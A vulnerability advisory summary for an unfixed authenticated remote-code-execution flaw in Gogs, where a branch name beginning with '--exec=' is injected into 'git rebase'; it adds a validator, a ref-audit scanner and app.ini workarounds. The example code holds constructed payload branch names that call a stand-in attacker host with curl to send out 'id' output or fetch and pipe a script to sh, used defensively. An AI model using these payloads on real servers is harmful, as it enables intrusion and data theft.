Full Report
A critical security vulnerability has been disclosed in Gogs, a popular open-source self-hosted Git service, that allows an authenticated user to execute arbitrary code under certain conditions. The security flaw, per Rapid7, is rated 9.4 on the CVSS scoring system. It does not have a CVE identifier. "The vulnerability allows any authenticated user to achieve remote code execution (RCE) on
Analysis Summary
# Vulnerability: Authenticated Remote Code Execution via Argument Injection in Gogs
## CVE Details
- **CVE ID:** No CVE identifier assigned at this time.
- **CVSS Score:** 9.4 (Critical)
- **CWE:** CWE-88: Improper Neutralization of Argument Delimiters in a Command ('Argument Injection')
## Affected Systems
- **Products:** Gogs (Open-source self-hosted Git service)
- **Versions:** All versions as of May 28, 2026; no fixed release exists.
- **Configurations:**
- Default configurations (where registration and repository creation are open).
- Instances with "Rebase merging" enabled.
- Impact covers all supported platforms: Windows, Linux, and macOS.
## Vulnerability Description
The flaw is an argument injection (CWE-88) in the way Gogs invokes `git rebase`. When a pull request is merged with the "Rebase before merging" option, Gogs places the user-controlled branch name on the `git rebase` command line without rejecting names that git will parse as options. An attacker therefore creates a branch whose name begins with `--exec=<command>`.
When the rebase runs, git treats the injected `--exec` option as genuine and executes the attached text as a shell command (git hands `--exec` arguments to the shell, so the attacker needs no further escaping). The command runs with the privileges of the account the Gogs service runs as, on any platform Gogs supports.
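The argv builders below are an added example, not Gogs's code, showing how a branch name ends up parsed as a git option and what a validator that closes the hole looks like. The invocation shape (`git rebase <onto> <branch>`) and the `MALICIOUS_BRANCH` value are constructed for illustration and are not taken from the Rapid7 analysis; the validation rules mirror those git applies in `git check-ref-format --branch`.

```python
"""Added example (not Gogs's code): why a branch name can become a git option,
and a validator that refuses such names before they reach `git rebase`.

The argv builders are hypothetical stand-ins for the merge code path; they
show the shape of the problem, not Gogs's exact invocation."""
import re
import shlex

# Constructed attacker input: a branch named so that git parses it as --exec.
MALICIOUS_BRANCH = "--exec=curl http://attacker.invalid/$(id | base64 -w0)"
BENIGN_BRANCH = "feature/login-fix"

# Characters git never allows in a refname (see git-check-ref-format(1)):
# control characters, space, DEL, ~ ^ : ? * [ and backslash.
_FORBIDDEN_CHARS = re.compile(r"[\x00-\x20\x7f~^:?*\[\\]")


def branch_name_problem(name: str):
    """Return None if `name` is a valid git branch name, else a short reason.

    Mirrors the rules git applies via `git check-ref-format --branch`."""
    if not name or name == "@" or name == "HEAD":
        return "empty or reserved name"
    if name.startswith("-"):
        return "starts with '-' (would be parsed as an option)"
    if name.startswith("/") or name.endswith("/") or "//" in name:
        return "bad slash placement"
    if name.endswith(".") or ".." in name or "@{" in name:
        return "contains '..', '@{' or trailing '.'"
    if _FORBIDDEN_CHARS.search(name):
        return "contains a character git forbids in refnames"
    for component in name.split("/"):
        if component.startswith(".") or component.endswith(".lock"):
            return "component starts with '.' or ends with '.lock'"
    return None


def is_valid_branch_name(name: str) -> bool:
    return branch_name_problem(name) is None


def rebase_argv_unsafe(branch: str, onto: str = "master") -> list:
    """Vulnerable pattern: the user-controlled name goes straight into argv.

    git parses any leading-dash argument as an option wherever it sits, so a
    branch called '--exec=...' turns the rebase into a command runner."""
    return ["git", "rebase", onto, branch]


def rebase_argv_safe(branch: str, onto: str = "master") -> list:
    """Hardened pattern: refuse anything that is not a well-formed branch name.

    Both names are validated; a name git would parse as an option never
    reaches the process spawn."""
    for name in (onto, branch):
        problem = branch_name_problem(name)
        if problem is not None:
            raise ValueError(f"refusing branch name {name!r}: {problem}")
    return ["git", "rebase", onto, branch]


def injected_options(argv: list, untrusted: list) -> list:
    """Audit helper: which untrusted values landed in argv looking like options."""
    return [a for a in argv if a in untrusted and a.startswith("-")]


if __name__ == "__main__":
    unsafe = rebase_argv_unsafe(MALICIOUS_BRANCH)
    print("vulnerable argv:", shlex.join(unsafe))
    print("injected options:", injected_options(unsafe, [MALICIOUS_BRANCH]))
    try:
        rebase_argv_safe(MALICIOUS_BRANCH)
    except ValueError as exc:
        print("hardened builder:", exc)
    print("hardened argv:", shlex.join(rebase_argv_safe(BENIGN_BRANCH)))
```

The point of the validator is that it rejects the whole class of option-looking names rather than blacklisting `--exec`: git has other rebase options that take commands or paths, and a list-based filter would be bypassed by the next one.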
## Exploitation
- **Status:** PoC available (Metasploit module released by Rapid7).
- **Complexity:** Low (Can be automated; requires no admin interaction).
- **Attack Vector:** Network (Authenticated).
## Impact
- **Confidentiality:** High (Access to all repositories, private data, credentials, and cross-tenant data).
- **Integrity:** High (Ability to tamper with hosted source code and server files).
- **Availability:** High (Potential for full system takeover or service disruption).
## Remediation
### Patches
- **None:** As of the report date, the vulnerability remains unpatched by the maintainer.
### Workarounds
Administrators should implement the following hardening measures in the `app.ini` configuration file:
- **Disable Public Registration:** Set `DISABLE_REGISTRATION = true` to prevent unauthorized actors from creating accounts.
- **Restrict Repo Creation:** Set `MAX_CREATION_LIMIT = 0` to prevent existing low-privileged users from creating new repositories to use as exploit vectors.
- **Audit Permissions:** Ensure only trusted users have write/merge access to existing repositories and audit repositories where "rebase merging" is enabled.
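The two `app.ini` settings above, shown as an added example rather than a file from the Gogs project. The section names (`[service]` and `[repository]`) follow the layout of Gogs's `custom/conf/app.ini`, and the "before" values are the permissive defaults (`MAX_CREATION_LIMIT = -1` means no per-user limit). Gogs reads the file at startup, so restart the service after changing it.

```ini
; Added example: the keys relevant to the workaround in custom/conf/app.ini.
; Section names follow Gogs's app.ini layout.

; --- Before: permissive defaults (exploitable on an internet-facing instance) ---
[service]
DISABLE_REGISTRATION = false

[repository]
MAX_CREATION_LIMIT = -1    ; -1 = unlimited repositories per user

; --- After: workaround until a fixed release is available ---
[service]
DISABLE_REGISTRATION = true ; new accounts can only be created by an admin

[repository]
MAX_CREATION_LIMIT = 0      ; existing users can no longer create repositories
```

These settings only stop new attacker-controlled accounts and repositories; a user who already has write access to a repository where rebase merging is enabled still needs the permission audit in the last bullet.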
## Detection
- **Indicators of Compromise:** Monitor the Gogs server log for HTTP 500 errors that follow repository creation or deletion events, and tie them back to the account that issued the requests.
- **Detection Methods:** Enumerate the refs of every hosted repository (for example with `git for-each-ref` on the bare repositories under the Gogs repository root) and flag branch names that begin with `-` or contain `--exec` or shell syntax; `git branch` and `git checkout -b` refuse names that begin with `-`, so any such ref was created deliberately. Also monitor for unexpected child processes (shells, `curl`, `wget` and similar) spawned by the Gogs process or its `git` children.
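A ref audit of the kind described above, as an added example that is not part of the report. The heuristics (leading `-`, `--exec`, shell metacharacters) are constructed for this example, as is the sample `git for-each-ref` listing; `scan_gogs_repo_root` assumes the Gogs repository root contains one bare `*.git` directory per repository and that `git` is on `PATH`.

```python
"""Added example (not from the report): audit branch names across the bare
repositories a Gogs instance hosts. The heuristics and the sample listing
are constructed for this example."""
import os
import re
import subprocess

# Names git itself would parse as an option, plus shell syntax that has no
# business in a branch name. Legitimate names never start with '-'.
_OPTION_LIKE = re.compile(r"^-")
_SHELL_SYNTAX = re.compile(r"--exec|[;|&`]|\$\(|\$\{")

REF_PREFIXES = ("refs/heads/", "refs/tags/", "refs/pull/")


def short_name(refname: str) -> str:
    """Strip the refs/heads/ (or tags/pull) prefix to get the user-visible name."""
    for prefix in REF_PREFIXES:
        if refname.startswith(prefix):
            return refname[len(prefix):]
    return refname


def classify_ref(refname: str):
    """Return a reason string if the ref name is suspicious, else None."""
    name = short_name(refname)
    if _OPTION_LIKE.match(name):
        return "starts with '-' (git would parse it as an option)"
    if _SHELL_SYNTAX.search(name):
        return "contains --exec or shell syntax"
    return None


def suspicious_refs(listing: str) -> list:
    """Parse `git for-each-ref --format='%(refname)%09%(objectname)'` output
    and return (refname, reason) pairs for refs worth a closer look."""
    hits = []
    for line in listing.splitlines():
        if not line.strip():
            continue
        refname = line.split("\t", 1)[0]
        reason = classify_ref(refname)
        if reason:
            hits.append((refname, reason))
    return hits


def scan_gogs_repo_root(root: str) -> dict:
    """Walk a Gogs repository root (directories named *.git) and run the
    check against each repository's live refs. Requires git on PATH."""
    findings = {}
    for dirpath, dirnames, _ in os.walk(root):
        for d in list(dirnames):
            if not d.endswith(".git"):
                continue
            repo = os.path.join(dirpath, d)
            out = subprocess.run(
                ["git", "-C", repo, "for-each-ref",
                 "--format=%(refname)\t%(objectname)"],
                capture_output=True, text=True, check=False,
            ).stdout
            hits = suspicious_refs(out)
            if hits:
                findings[repo] = hits
            dirnames.remove(d)  # do not descend into the bare repository
    return findings


# Constructed sample listing, in the shape `git for-each-ref` prints it.
SAMPLE_LISTING = """\
refs/heads/master\t1111111111111111111111111111111111111111
refs/heads/feature/login-fix\t2222222222222222222222222222222222222222
refs/heads/--exec=curl http://attacker.invalid/p|sh\t3333333333333333333333333333333333333333
refs/heads/release/v1.0\t4444444444444444444444444444444444444444
refs/tags/v1.0\t5555555555555555555555555555555555555555
"""

if __name__ == "__main__":
    for refname, reason in suspicious_refs(SAMPLE_LISTING):
        print(f"{refname!r}: {reason}")
```

Run `scan_gogs_repo_root` against the instance's repository root (the `ROOT` value under `[repository]` in `app.ini`) from a read-only account; a hit is a ref that git's own branch creation commands would have refused, so it points directly at the account that pushed or created it.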
## References
- Rapid7 Technical Analysis: hxxps[://]www[.]rapid7[.]com/blog/post/ve-authenticated-rce-via-argument-injection-gogs-unfixed/
- Metasploit Module: hxxps[://]github[.]com/rapid7/metasploit-framework/pull/21515
- News Source: hxxps[://]thehackernews[.]com/2026/05/critical-gogs-rce-vulnerability-lets.html